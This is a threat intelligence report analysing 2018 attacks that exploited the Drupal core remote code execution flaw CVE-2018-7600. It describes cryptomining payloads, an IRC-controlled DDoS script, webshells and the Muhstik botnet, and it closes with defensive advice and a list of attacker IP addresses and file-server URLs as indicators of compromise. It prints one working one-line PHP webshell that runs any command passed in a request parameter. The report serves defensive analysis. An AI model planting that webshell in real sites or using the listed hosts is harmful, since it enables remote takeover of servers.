Drupal Remote Code Execution Vulnerability Analysis

Overview

Drupal released a security advisory on 28 March 2018 to disclose a remote execution code (RCE) vulnerability in the Drupal core, sa-core-2018-002 (CVE-2018-7600). Soon, two more security advisories were also published within a month, including a Cross-Site Scripting (XSS) vulnerability and a critical code execution vulnerability — sa-core-2018-004 (CVE-2018-7602). In the following two months, Drupal attacks occurred frequently. Combined with security intelligence data, NSFOCUS Threat Intelligence (NTI) center gave a detailed description of common attack tactics targeting Drupal programs and took an analysis to relevant situation in the hope of helping security practitioners get some suggestions and reference.

Description of Incident Course of Events 

Although the vulnerability had been disclosed, the PoC didn’t turn up until two weeks later. Only in several hours after the disclosure of the PoC, attacks exploiting this vulnerability appeared. Then many more attacks against Drupal programs sprang up on the Internet and reached a peak on April 29, and attacks kept going on.

As shown on figure below, the URIs triggered in the version 7.x gradually increase and later become more than the version 8.x, which means attackers have started turning their attention to the version 7.x from 8.x.

The following two figures present distribution of attack IP addresses worldwide in the last two months, which mainly focused on North America, Europe and South America. Categorized by countries, the attack IP addresses were mainly located in Mexico, Ecuador, Russia, and the United States.

We also kept close watch on several IP addresses from which most frequent attacks occurred and we found that a part of these IP addresses had also taken part in other types of vulnerability exploit attacks, such as Weblogic deserialization vulnerability (CVE-2017-10271) and Struts2-s2045 (CVE-2017-5638). Besides, the worm-like spreading over intranets of a few IP addresses approves that the hosts of these IP addresses are parts of some botnets.

Attack and Exploit

According to the monitoring data, we found that three attack tactics emerged in the Internet soon after the disclosure of the vulnerability.

• Attackers used the vulnerability to implant a digital currency mining program in the host computer and used the host resources for mining operations. The mining process mainly aimed at Monero (XMR) and had versions both Windows and Linux versions.
• Remote Control. This vulnerability exploit was able to execute commands, download remote files, launch TCP/UDP flood, etc.
• WebShell implantation. Webshell we captured included one-word Trojan, mini Trojan, and powerful full Trojan.

Mining exploit was the most popular one among the three attack tactics. Since related attack commands and mining pool addresses also appeared in other RCE exploits, it is very likely that groups in black industry chains also paid close attention to these critical vulnerabilities. From the statistics taken to the three categories of attacks, victim hosts implanted mining scripts accounted for 95%, while samples implanted remote control malware and website backdoors accounted for 3% and 1% separately, with defaced webpages on victim websites taking a small portion.

Proportion of Each Category

Mining

After the RCE vulnerability was disclosed, groups in black industry chain began to implant mining programs to vulnerable hosts for profiting using the system resources. This kind of attacks often emerges earlier than any other attacks. In addition, black chain groups usually send both Linux- and Windows- based attack payload to different platforms to ensure success of their attacks.

1. Windows

In Windows system, attackers would write a VBScript running in PowerShell and call WScript to download malicious programs, or download directly through PowerShell. Configuration files would be released by running the sample and register would be tampered to protect the malicious program.

The following command is used to download 5_DRUPAL from 188.166.148.89 and then run it in PowerShell.

2. Linux

Attack payload in Linux system is diversified, disguised as jpg. or pdf. files with hybrid coding, for example. Attackers would match x86 or x64 to download mining programs in victim hosts. They also would write a scheduled task to maintain constancy to help them achieve their ultimate purpose – obtaining digital currencies using the system resources.

Here is an example:

Using Wget to download a Shell script

Octal coded payload

All behaviors of these samples are aimed to obtain Monero. Some wallet addresses were blocked by the Monero organizer in the exploiting process as identified to be relevant to botnets.

During this research period, we found the first botnet exploiting CVE-2018-7600 and making it spread. It was Muhstik. We also captured several active samples. With analysis, NTI figured out the connection between this sample family and the Command & Control (C&C).

Muhstik Contextual Intelligence chart

Source: NSFOCUS Threat Intelligence (NTI)

Remote Control

When the vulnerability exploit broke out, we detected a remotely-controlled DDoS script spreading by exploiting the vulnerability. It was based on IRC protocol and written in the Perl language, annotated in Portuguese and Spanish. We analyzed its functions and uncovered one C&C host 104.160.176.178. This script would execute commands, download remote files or launch TCP/UPD Flood according to directions it received.

Some directions

WebShell

Besides implanting mining and remote-control programs to victim hosts, remote WebShell download and implantation was also a widely used for attackers. It is easier to see from many attacks that more and more attackers were fond of using online file/txt sharing platforms to store WebShell or Bash scripts for hiding real hosts.

We captured several categories of WebShell samples, included one-word Trojan, mini Trojan, and powerful full Trojan.

One-word Trojan:

<?php if(isset($_REQUEST[‘c’])) {system( $_REQUEST[‘c’].’2>&1′);}

The following table shows IP addresses sending one-word Trojan and its frequency in two weeks.

Mini Trojan

Full Trojan

Conclusions and Suggestions

During tracking and observing of Drupal Core RCE vulnerability exploits, we have the following findings:

1. It is a very short time from the publication of PoC to the emerging of effective attacks, with the result that the time for protection is extremely limited. In this RCE exploit, the gap is hours only.
2. To find and exploit more hosts is a common purpose for hackers. Hackers developed attack tools in a very short time after vulnerability publication and, through automatic scanning and exploit vectors, started to search for vulnerable hosts quickly on the Internet. All websites with vulnerabilities are potential victims. Therefore, administrators should pay enough attention to vulnerabilities on their websites and patch them as soon as possible.
3. Hackers have strong backtracking capability. They prefer using online file sharing platforms like Pastebin to hide themselves.

Suggestions

4. Website administrators should keep close watch on vulnerabilities related to website programs, update website programs as soon as possible and upgrade protection rules on devices.
5. Administrators should pay attention to the usage of system resources. A burst of resources utilization within a very short time and keeping the usage at a high level may a sign of mining program implantation. Timely backup are necessary for malware cleaning up at any time.

Relevant IOC

Network communications

142.44.240.14

145.239.93.215

188.166.148.89:444

217.182.231.56:443

195.22.127.225

104.160.176.178

File servers

http://94.41.167.11/

http://195.22.126.16/

http://188.166.148.89:53/

http://192.241.247.212/

http://93.174.93.149/

http://198.50.179.109:8020/

Sample Hash